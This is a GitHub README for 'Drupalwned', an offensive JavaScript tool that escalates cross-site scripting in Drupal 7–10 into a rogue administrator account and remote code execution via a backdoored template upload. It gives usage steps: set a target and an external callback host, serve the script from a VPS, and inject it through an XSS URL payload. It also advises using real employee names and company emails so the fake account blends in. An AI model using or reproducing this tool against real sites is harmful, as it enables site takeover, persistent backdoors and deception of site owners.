About - Key Features - How To Use - Examples - Contributing
Drupalwned is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other's criticals vulnerabilities in Drupal CMS.
💧 This script provides support for Drupal Versions 7.X.X, 8.X.X, 9.X.X and 10.X.X. 💧
- Privilege Escalation
- Creates an administrative user in Drupal.
- (RCE) Upload Template
- Upload custom templates backdoored to Drupal.
- // Pending
- more ways to get RCE
Example.mp4
1) Clone the Repository
git clone https://github.com/nowak0x01/Drupalwned
2) Edit the script by selecting the desired function and modifying its variable values. (Example: DPCreateAccount)
// ************************************ ~% Variables %~ ************************************ //
var Target = "https://172.17.0.1:8000/"; // Ex: https://192.168.84.212:8000/drupal/
var Callback = "http://zfi0g0xtiqb6qjh564xr92xnxe35rvfk.oastify.com/"; // Ex: https://collaborator.oastify.com/ (optional) (only if you want to receive feedback at each stage).
// ************************************ ~% Functions %~ ************************************ //
// DPCreateAccount(); // (Privilege Escalation) - Creates an Administrative user in Drupal.
// DPUploadTemplate(); // (RCE) - Upload a Template module (backdoor) to Drupal.
function DPCreateAccount() {
/* ************************************************************************************************************************************************ */
var Email = "nowak@example.com"; // Ex: user@company.net (It is recommended to use a business email from the target company) (No email will be sent to the email address entered). - <Mandatory>
var Username = "nowak"; // (It is recommended to use a valid employee name from the target company). - <Mandatory>
var Password = `j^QEkyvd7*g3`; /* - <Mandatory>
Make it at least 12 characters
Add lowercase letters
Add uppercase letters
Add numbers
Add punctuation
*/
/* ************************************************************************************************************************************************ */
3) Start a web server
python3 -m http.server 80
4) Go to the Drupal XSS vector and include drupalwned.js
https://drupal.example.com/plugin.php?s=<script%20src="//VPS/drupalwned.js"></script>
🌧️ DPCreateAccount() - Creates an user in Drupal.
CreateAccount.mp4
⛅ DPUploadTemplate() - Upload a custom template backdoored to Drupal.
UploadTemplate.mp4
If you're interested in contributing, enhancing the existing code, your efforts would be immensely appreciated. Your contributions will play a key role in making this project even better.
r ain rai nrain rainrai nrainrain ainrainrain rainrainrainr ainrainrainrain rainrainrainrainr ainrainrainrainrainra Drupalwned (https://github.com/nowak0x01/Drupalwned) inra nrainrainrainrainrai @Author: Hudson Nowak nrain inrainrainrainrainrain rain nrainrainrainrainrainrai nrai inrainrainrainrainrainrain rai inrainrainrainrainrainrainr rain nrainrainrainrainrainrainr rainr nrainrainrainrainrainrai nrain ainrainrainrainrainrain rainrainrainrainrainrainr rainranirainrainrainr ainrainrain